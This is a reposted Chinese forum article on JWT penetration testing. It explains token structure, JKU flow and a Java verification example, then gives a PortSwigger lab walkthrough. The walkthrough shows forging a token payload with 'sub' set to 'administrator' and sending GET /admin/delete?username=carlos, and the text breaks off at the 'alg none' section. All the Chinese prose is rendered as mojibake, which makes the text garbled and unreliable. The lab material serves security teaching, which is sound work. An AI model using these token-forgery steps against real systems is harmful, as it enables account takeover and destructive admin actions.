¸É»õ | JWTÉøÍ¸×ËÊÆÒ»ÆªÍ¨ - web appÉøÍ¸²âÊÔ::¡ºWeb App penetration testing¡» - ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË

admin ·¢±íÓÚ 2024-3-1 19:49:25

¸É»õ | JWTÉøÍ¸×ËÊÆÒ»ÆªÍ¨

¸É»õ | JWTÉøÍ¸×ËÊÆÒ»ÆªÍ¨


<a href="javascript:void(0);">ÉøÍ¸°²È«ÍÅ¶Ó</a> 2023-10-20 00:00 ºþ±±


ÎÄÕÂÇ°ÑÔ


ÓÉÓÚÎ¢ÐÅ¹«ÖÚºÅÍÆËÍ»úÖÆ¸Ä±äÁË£¬¿ìÀ´ÐÇ±ê²»ÔÙÃÔÂ·£¬Ð»Ð»´ó¼Ò£¡ 
 



<img width="465" height="216" src="http://cobjon.com/w/php/upload/202403/01/75bccb89.png" alt="vshapes=" "="" style="vertical-align:middle;" />


ÆóÒµÄÚ²¿²úÆ·Ó¦ÓÃÊ¹ÓÃJWT×÷ÎªÓÃ»§µÄÉí·ÝÈÏÖ¤·½Ê½£¬ÔÚ¶ÔÓ¦ÓÃÆÀ¹ÀÊ±·¢ÏÖÁËÐÂµÄ¹ØÓÚJWTµÄ»á»°°²È«´øÀ´µÄ°²È«ÎÊÌâ£¬ºóÆÚÔÙÕûÀíÊ±ÓÖ¼ÓÈëÁËÖ®Ç°ÒÅÁôµÄ²¿·ÖJWT°²È«ÎÊÌâ£¬ÖÁ´Ë»ã×Ü³ÉÒ»ÆªÍêÕûµÄJWTÎÄÕÂ


¼òµ¥½éÉÜ


JWT(JSON Web Token)ÊÇÒ»ÖÖÓÃÓÚÉí·ÝÈÏÖ¤ºÍÊÚÈ¨µÄ¿ª·Å±ê×¼£¬ËüÍ¨¹ýÔÚÍøÂçÓ¦ÓÃ¼ä´«µÝ±»¼ÓÃÜµÄJSONÊý¾ÝÀ´°²È«µØ´«ÊäÐÅÏ¢Ê¹µÃÉí·ÝÑéÖ¤ºÍÊÚÈ¨±äµÃ¸ü¼Ó¼òµ¥ºÍ°²È«£¬JWT¶ÔÓÚÉøÍ¸²âÊÔÈËÔ±¶øÑÔ¿ÉÄÜÊÇÒ»ÖÖ·Ç³£ÎüÒýÈËµÄ¹¥»÷Í¾¾¶£¬ÒòÎªËüÃÇ²»½öÊÇÈÃÄã»ñµÃÎÞÏÞ·ÃÎÊÈ¨ÏÞµÄ¹Ø¼ü¶øÇÒ»¹±»ÊÓÎªÒþ²ØÁËÍ¨ÍùÒÔÏÂÌØÈ¨µÄÍ¾¾¶£¬ÀýÈç:ÌØÈ¨Éý¼¶¡¢ÐÅÏ¢Ð¹Â¶¡¢SQLi¡¢XSS¡¢SSRF¡¢RCE¡¢LFIµÈ


»ù´¡¸ÅÄî

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
JWS£ºSigned JWT£¬Ç©Ãû¹ýµÄJWT
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
JWK£ºJWTµÄÃÜÔ¿£¬Ò²¾ÍÊÇÎÒÃÇ³£ËµµÄSECRET
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
JWE£ºEncrypted JWT²¿·Öpayload¾¹ý¼ÓÃÜµÄJWT
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
JKU£ºJKU(JSON Web Key Set URL)ÊÇJWT HeaderÖÐµÄÒ»¸ö×Ö¶Î£¬×Ö¶ÎÄÚÈÝÊÇÒ»¸öURI£¬¸ÃURIÓÃÓÚÖ¸¶¨ÓÃÓÚÑéÖ¤ÁîÅÆÃØÔ¿µÄ·þÎñÆ÷£¬¸Ã·þÎñÆ÷ÓÃÓÚ»Ø¸´JWK
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
X5U£ºX5UÊÇJWT HeaderÖÐµÄÒ»¸ö×Ö¶Î£¬Ö¸ÏòÒ»×éX509¹«¹²Ö¤ÊéµÄURL£¬ÓëJKU¹¦ÄÜÀàËÆ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
X.509±ê×¼£ºX.509±ê×¼ÊÇÃÜÂëÑ§Àï¹«Ô¿Ö¤ÊéµÄ¸ñÊ½±ê×¼£¬°üÀ¨TLS/SSL(WWWÍòÎ¬Íø°²È«ä¯ÀÀµÄ»ùÊ¯)ÔÚÄÚµÄÖÚ¶àInternetÐÒé¶¼Ó¦ÓÃÁËX.509Ö¤Êé£©
</li>
</ul>

»ù±¾½á¹¹


JWT(JSON Web Token)µÄ½á¹¹ÓÉÈý²¿·Ö×é³É£¬·Ö±ðÊÇHeader¡¢PayloadºÍSignature£¬ÏÂÃæÊÇÃ¿Ò»²¿·ÖµÄÏêÏ¸½éÉÜºÍÊ¾Àý£º


Header


Header°üº¬ÁËJWTÊ¹ÓÃµÄËã·¨ºÍÀàÐÍµÈÔªÊý¾ÝÐÅÏ¢£¬Í¨³£Ê¹ÓÃJSON¶ÔÏó±íÊ¾²¢Ê¹ÓÃBase64±àÂë£¬HeaderÖÐ°üº¬Á½¸ö×Ö¶Î£ºalgºÍtyp 
alg(algorithm)£ºÖ¸¶¨ÁËÊ¹ÓÃµÄ¼ÓÃÜËã·¨£¬³£¼ûµÄÓÐHMAC¡¢RSAºÍECDSAµÈËã·¨ 
typ(type)£ºÖ¸¶¨ÁËJWTµÄÀàÐÍ£¬Í¨³£ÎªJWT


ÏÂÃæÊÇÒ»¸öÊ¾ÀýHeader£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
  "alg": "HS256", 
  "typ": "JWT" 
}

</div>

ÆäÖÐalgÖ¸¶¨ÁËÊ¹ÓÃHMAC-SHA256Ëã·¨½øÐÐÇ©Ãû£¬typÖ¸¶¨ÁËJWTµÄÀàÐÍÎªJWT


Payload


Payload°üº¬ÁËJWTµÄÖ÷ÒªÐÅÏ¢£¬Í¨³£Ê¹ÓÃJSON¶ÔÏó±íÊ¾²¢Ê¹ÓÃBase64±àÂë£¬PayloadÖÐ°üº¬Èý¸öÀàÐÍµÄ×Ö¶Î£º×¢²áÉùÃ÷¡¢¹«¹²ÉùÃ÷ºÍË½ÓÐÉùÃ÷

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
¹«¹²ÉùÃ÷(Public Claims)£ºÊÇ×Ô¶¨ÒåµÄ×Ö¶Î£¬ÓÃÓÚ´«µÝ·ÇÃô¸ÐÐÅÏ¢£¬ÀýÈç:ÓÃ»§ID¡¢½ÇÉ«µÈ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
Ë½ÓÐÉùÃ÷(Private Claims)£ºÊÇ×Ô¶¨ÒåµÄ×Ö¶Î£¬ÓÃÓÚ´«µÝÃô¸ÐÐÅÏ¢£¬ÀýÈçÃÜÂë¡¢ÐÅÓÃ¿¨ºÅµÈ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
×¢²áÉùÃ÷(Registered Claims)£ºÔ¤¶¨ÒåµÄ±ê×¼×Ö¶Î£¬°üº¬ÁËÒ»Ð©JWTµÄÔªÊý¾ÝÐÅÏ¢£¬ÀýÈç:·¢ÐÐÕß¡¢¹ýÆÚÊ±¼äµÈ
</li>
</ul>

ÏÂÃæÊÇÒ»¸öÊ¾ÀýPayload£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
  "sub": "1234567890", 
  "name": "John Doe", 
  "iat": 1516239022 
}

</div>

ÆäÖÐsub±íÊ¾Ö÷Ìâ£¬name±íÊ¾Ãû³Æ£¬iat±íÊ¾JWTµÄÇ©·¢Ê±¼ä


Signature


SignatureÊÇÊ¹ÓÃÖ¸¶¨Ëã·¨¶ÔHeaderºÍPayload½øÐÐÇ©ÃûÉú³ÉµÄ£¬ÓÃÓÚÑéÖ¤JWTµÄÍêÕûÐÔºÍÕæÊµÐÔ£¬SignatureµÄÉú³É·½Ê½Í¨³£ÊÇ½«HeaderºÍPayloadÁ¬½ÓÆðÀ´È»ºóÊ¹ÓÃÖ¸¶¨Ëã·¨¶ÔÆä½øÐÐÇ©Ãû£¬×îÖÕ½«Ç©Ãû½á¹ûÓëHeaderºÍPayloadÒ»Æð×é³ÉJWT£¬SignatureµÄÉú³ÉºÍÑéÖ¤ÐèÒªÊ¹ÓÃÏàÍ¬µÄÃÜÔ¿£¬ÏÂÃæÊÇÒ»¸öÊ¾ÀýSignature

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)

</div>

ÆäÖÐHMACSHA256ÊÇÊ¹ÓÃHMAC SHA256Ëã·¨½øÐÐÇ©Ãû£¬headerºÍpayloadÊÇ¾¹ýBase64±àÂëµÄHeaderºÍPayload£¬secretÊÇÓÃÓÚÇ©ÃûºÍÑéÖ¤µÄÃÜÔ¿£¬×îÖÕ½«Header¡¢PayloadºÍSignatureÁ¬½ÓÆðÀ´ÓÃ¾äµã(.)·Ö¸ô¾ÍÐÎ³ÉÁËÒ»¸öÍêÕûµÄJWT£¬ÏÂÃæÊÇÒ»¸öÊ¾ÀýJWT£¬ÆäÖÐµÚÒ»²¿·ÖÊÇHeader£¬µÚ¶þ²¿·ÖÊÇPayload£¬µÚÈý²¿·ÖÊÇSignature£¬×¢ÒâJWT ÖÐµÄÃ¿Ò»²¿·Ö¶¼ÊÇ¾¹ýBase64±àÂëµÄ£¬µ«²¢²»ÊÇ¼ÓÃÜµÄ£¬Òò´ËJWTÖÐµÄÐÅÏ¢ÊÇ¿ÉÒÔ±»½âÃÜµÄ

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9. 
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. 
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

</div>

ÔÚÏßÆ½Ì¨


ÏÂÃæÊÇÒ»¸öJWTÔÚÏß¹¹ÔìºÍ½â¹¹µÄÆ½Ì¨£º 
https://jwt.io/


<img width="554" height="269" src="http://cobjon.com/w/php/upload/202403/01/c263a182.png" alt="vshapes=" "="" style="vertical-align:middle;" />


¹¤×÷ÔÀí


JWT¹¤×÷ÔÀí


JWTµÄ¹¤×÷Á÷³ÌÈçÏÂ£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÓÃ»§ÔÚ¿Í»§¶ËµÇÂ¼²¢½«µÇÂ¼ÐÅÏ¢·¢ËÍ¸ø·þÎñÆ÷
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
·þÎñÆ÷Ê¹ÓÃË½Ô¿¶ÔÓÃ»§ÐÅÏ¢½øÐÐ¼ÓÃÜÉú³ÉJWT²¢½«Æä·¢ËÍ¸ø¿Í»§¶Ë
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
¿Í»§¶Ë½«JWT´æ´¢ÔÚ±¾µØ£¬Ã¿´ÎÏò·þÎñÆ÷·¢ËÍÇëÇóÊ±Ð¯´øJWT½øÐÐÈÏÖ¤
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
·þÎñÆ÷Ê¹ÓÃ¹«Ô¿¶ÔJWT½øÐÐ½âÃÜºÍÑéÖ¤£¬¸ù¾ÝJWTÖÐµÄÐÅÏ¢½øÐÐÉí·ÝÑéÖ¤ºÍÊÚÈ¨
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
·þÎñÆ÷´¦ÀíÇëÇó²¢·µ»ØÏìÓ¦£¬¿Í»§¶Ë¸ù¾ÝÏìÓ¦½øÐÐÏàÓ¦µÄ²Ù×÷
</li>
</ul>

JKU¹¤×÷ÔÀí


Step 1£ºÓÃ»§Ð¯´øJWS(´øÓÐÇ©ÃûµÄJWT)·ÃÎÊÓ¦ÓÃ


<img width="553" height="239" src="http://cobjon.com/w/php/upload/202403/01/ff795cb3.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 2£ºÓ¦ÓÃ³ÌÐò½âÂëJWSµÃµ½JKU×Ö¶Î


<img width="554" height="161" src="http://cobjon.com/w/php/upload/202403/01/4399d09a.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 3£ºÓ¦ÓÃ¸ù¾ÝJKU·ÃÎÊ·µ»ØJWKµÄ·þÎñÆ÷


<img width="554" height="166" src="http://cobjon.com/w/php/upload/202403/01/44b4919d.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 4£ºÓ¦ÓÃ³ÌÐòµÃµ½JWK


<img width="554" height="165" src="http://cobjon.com/w/php/upload/202403/01/df595948.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 5£ºÊ¹ÓÃJWKÑéÖ¤ÓÃ»§JWS


<img width="554" height="155" src="http://cobjon.com/w/php/upload/202403/01/f42df850.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 6£ºÑéÖ¤Í¨¹ýÔòÕý³£ÏìÓ¦


<img width="554" height="165" src="http://cobjon.com/w/php/upload/202403/01/eb60f697.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Â©¶´¹¥·À


Ç©ÃûÎ´Ð£Ñé


ÑéÖ¤¹ý³Ì


JWT(JSON Web Token)µÄÇ©ÃûÑéÖ¤¹ý³ÌÖ÷Òª°üÀ¨ÒÔÏÂ¼¸¸ö²½Öè£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
·ÖÀë½â¹¹£ºJWTµÄHeaderºÍPayloadÊÇÍ¨¹ý¾äµã(.)·Ö¸ôµÄ£¬Òò´ËÐèÒª½«JWT°´ÕÕ¾äµã·Ö¸ô·û½øÐÐ·ÖÀë
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÑéÖ¤Ç©Ãû£ºÍ¨¹ýÊ¹ÓÃÖ¸¶¨Ëã·¨¶ÔHeaderºÍPayload½øÐÐÇ©ÃûÉú³ÉÇ©Ãû½á¹û£¬È»ºó½«Ç©Ãû½á¹ûÓëJWTÖÐµÄÇ©Ãû²¿·Ö½øÐÐ±È½Ï£¬Èç¹ûÁ½ÕßÏàÍ¬ÔòËµÃ÷JWTµÄÇ©ÃûÊÇÓÐÐ§µÄ£¬·ñÔòËµÃ÷JWTµÄÇ©ÃûÊÇÎÞÐ§µÄ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÑéÖ¤ÐÅÏ¢£ºÈç¹ûJWTµÄÇ©ÃûÊÇÓÐÐ§µÄÔòÐèÒª¶ÔPayloadÖÐµÄÐÅÏ¢½øÐÐÑéÖ¤£¬ÀýÈç:¿ÉÒÔÑéÖ¤JWTÖÐµÄ¹ýÆÚÊ±¼ä¡¢·¢ÐÐÕßµÈÐÅÏ¢ÊÇ·ñÕýÈ·£¬Èç¹ûÑéÖ¤Ê§°ÜÔòËµÃ÷JWTÊÇÎÞÐ§µÄ
</li>
</ul>

ÏÂÃæÊÇÒ»¸öÊ¹ÓÃJAVA½øÐÐJWTÇ©ÃûÑéÖ¤µÄÊ¾Àý´úÂë£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
import io.jsonwebtoken.Claims; 
import io.jsonwebtoken.Jwts; 
import io.jsonwebtoken.SignatureAlgorithm; 
 
import java.util.Date; 
 
public class JWTExample { 
 
    private static final String SECRET_KEY = "my_secret_key"; 
 
    public static void main(String[] args) { 
        // ¹¹½¨ JWT 
        String jwtToken = Jwts.builder() 
                .setSubject("1234567890") 
                .claim("name", "John Doe") 
                .setIssuedAt(new Date()) 
                .setExpiration(new Date(System.currentTimeMillis() + 3600000)) // 1 hour 
                .signWith(SignatureAlgorithm.HS256, SECRET_KEY) 
                .compact(); 
 
        // ÑéÖ¤ JWT 
        try { 
            // ·ÖÀë Header, Payload ºÍ Signature 
            String[] jwtParts = jwtToken.split("\\."); 
            String header = jwtParts[0]; 
            String payload = jwtParts[1]; 
            String signature = jwtParts[2]; 
 
            // ÑéÖ¤Ç©Ãû 
            String expectedSignature = Jwts.parser() 
                    .setSigningKey(SECRET_KEY) 
                    .parseClaimsJws(jwtToken) 
                    .getSignature(); 
            if (!signature.equals(expectedSignature)) { 
                throw new RuntimeException("Invalid JWT signature"); 
            } 
 
            // ÑéÖ¤ Payload ÖÐµÄÐÅÏ¢ 
            Claims claims = Jwts.parser() 
                    .setSigningKey(SECRET_KEY) 
                    .parseClaimsJws(jwtToken) 
                    .getBody(); 
            System.out.println("Valid JWT"); 
        } catch (Exception e) { 
            System.out.println("Invalid JWT: " + e.getMessage()); 
        } 
    } 
}

</div>

ÔÚÉÏÃæµÄÊ¾Àý´úÂëÖÐÊ¹ÓÃjwt¿â½øÐÐJWTµÄÇ©ÃûºÍÑéÖ¤£¬Ê×ÏÈ¹¹½¨ÁËÒ»¸öJWT£¬È»ºó½«Æä·ÖÀëÎªHeader¡¢PayloadºÍSignatureÈý²¿·Ö£¬Ê¹ÓÃparseClaimsJwsº¯Êý¶ÔJWT½øÐÐ½âÎöºÍÑéÖ¤£¬´Ó¶ø»ñÈ¡ÆäÖÐµÄPayloadÖÐµÄÐÅÏ¢²¢½øÐÐÑéÖ¤£¬×îºóÈç¹û½âÎöºÍÑéÖ¤³É¹¦£¬ÔòËµÃ÷JWTÊÇÓÐÐ§µÄ£¬·ñÔòËµÃ÷JWTÊÇÎÞÐ§µÄ£¬ÔÚÊµ¼ÊÓ¦ÓÃÖÐÓ¦¸Ã½«SECRET_KEYÌæ»»ÎªÓ¦ÓÃ³ÌÐòµÄÃÜÔ¿


Â©¶´°¸Àý


JWT¿â»áÍ¨³£Ìá¹©Ò»ÖÖÑéÖ¤ÁîÅÆµÄ·½·¨ºÍÒ»ÖÖ½âÂëÁîÅÆµÄ·½·¨£¬±ÈÈç:Node.js¿âjsonwebtokenÓÐverify()ºÍdecode()£¬ÓÐÊ±¿ª·¢ÈËÔ±»á»ìÏýÕâÁ½ÖÖ·½·¨£¬Ö»½«´«ÈëµÄÁîÅÆ´«µÝ¸ødecode()·½·¨£¬ÕâÒâÎ¶×ÅÓ¦ÓÃ³ÌÐò¸ù±¾²»ÑéÖ¤Ç©Ãû£¬¶øÎÒÃÇÏÂÃæµÄÊ¹ÓÃÔòÊÇÒ»¸ö»ùÓÚJWTµÄ»úÖÆÀ´´¦Àí»á»°£¬ÓÉÓÚÊµÏÖÈ±ÏÝ·þÎñÆ÷²»»áÑéÖ¤ËüÊÕµ½µÄÈÎºÎJWTµÄÇ©Ãû£¬Èç¹ûÒª½â´ðÊµÑéÎÊÌâ£¬ÄúÐèÒªÐÞ¸Ä»á»°ÁîÅÆÒÔ·ÃÎÊÎ»ÓÚ/adminµÄ¹ÜÀíÃæ°åÈ»ºóÉ¾³ýÓÃ»§carlos£¬Äú¿ÉÒÔÊ¹ÓÃÒÔÏÂÆ¾¾ÝµÇÂ¼×Ô¼ºµÄÕÊ»§:wiener:peter 
°Ð³¡µØÖ·£ºhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature


<img width="553" height="339" src="http://cobjon.com/w/php/upload/202403/01/acbaee63.png" alt="vshapes=" "="" style="vertical-align:middle;" />


ÑÝÊ¾²½Öè£º 
Step 1£ºµã»÷ÉÏ·½µÄ"Access the Lab"·ÃÎÊ°Ð³¡²¢µÇÂ¼ÕË»§


<img width="554" height="282" src="http://cobjon.com/w/php/upload/202403/01/5df6c122.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 2£º½øÈëµ½Web½çÃæ²¢µÇÂ¼°Ð³¡ÕË»§

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
wiener:peter

</div>

<img width="554" height="416" src="http://cobjon.com/w/php/upload/202403/01/69ff8e26.png" alt="vshapes=" "="" style="vertical-align:middle;" />


<img width="554" height="270" src="http://cobjon.com/w/php/upload/202403/01/93c8c383.png" alt="vshapes=" "="" style="vertical-align:middle;" />


µÇÂ¼Ö®ºó»á¿´µ½ÈçÏÂÒ»¸ö¸üÐÂÓÊÏäµÄ½çÃæ


<img width="554" height="282" src="http://cobjon.com/w/php/upload/202403/01/349d041e.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Step 3£º´ËÊ±ÔÚÎÒÃÇµÄburpsuiteÖÐÎÒÃÇ¿ÉÒÔ¿´µ½ÈçÏÂµÄ»á»°ÐÅÏ¢


<img width="554" height="237" src="http://cobjon.com/w/php/upload/202403/01/66cf1bfc.png" alt="vshapes=" "="" style="vertical-align:middle;" />


´ËÊ±²éÑ¯µ±Ç°ÓÃ»§¿ÉÒÔ¿´µ½»áÏÔÊ¾µ±Ç°ÓÃ»§Îªwiener£º


<img width="554" height="267" src="http://cobjon.com/w/php/upload/202403/01/c40e4531.png" alt="vshapes=" "="" style="vertical-align:middle;" />


½ØÈ¡ÉÏÃæÖÐ¼äÒ»²¿·Öbase64±àÂëµÄ²¿·Ö¸ü¸ÄÉÏÃæµÄsubÎª"administrator"

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MDA4M30

</div>

<img width="554" height="229" src="http://cobjon.com/w/php/upload/202403/01/418bb299.png" alt="vshapes=" "="" style="vertical-align:middle;" />


 


¹¹ÔìÒ»¸ösubÎª"administrator"µÄÔØºÉ²¢½«Æä½øÐÐbase64±àÂë´¦Àí£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTAwODN9

</div>

<img width="554" height="204" src="http://cobjon.com/w/php/upload/202403/01/5a87fc1e.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Ìæ»»Ö®ºóÖØÐÂ·¢ËÍÇëÇó£º


<img width="554" height="253" src="http://cobjon.com/w/php/upload/202403/01/522db53c.png" alt="vshapes=" "="" style="vertical-align:middle;" />


°´ÕÕÌâÄ¿ÒªÇó·ÃÎÊ/adminÂ·¾¶£¬·¢ÏÖÁ½¸öÉ¾³ýÓÃ»§µÄµ÷ÓÃ½Ó¿Ú£º


<img width="554" height="255" src="http://cobjon.com/w/php/upload/202403/01/73573827.png" alt="vshapes=" "="" style="vertical-align:middle;" />


ÇëÇóÃô¸ÐÁ´½Ó¡ª¡ªÉ¾³ýÓÃ»§carlos

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
GET /admin/delete?username=carlos HTTP/1.1

</div>

<img width="554" height="215" src="http://cobjon.com/w/php/upload/202403/01/c757b3e9.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Íê³É°Ð³¡µÄ½â´ð£º


<img width="554" height="184" src="http://cobjon.com/w/php/upload/202403/01/5a8ea477.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Ç©ÃûÓÃNone


³¡¾°½éÉÜ


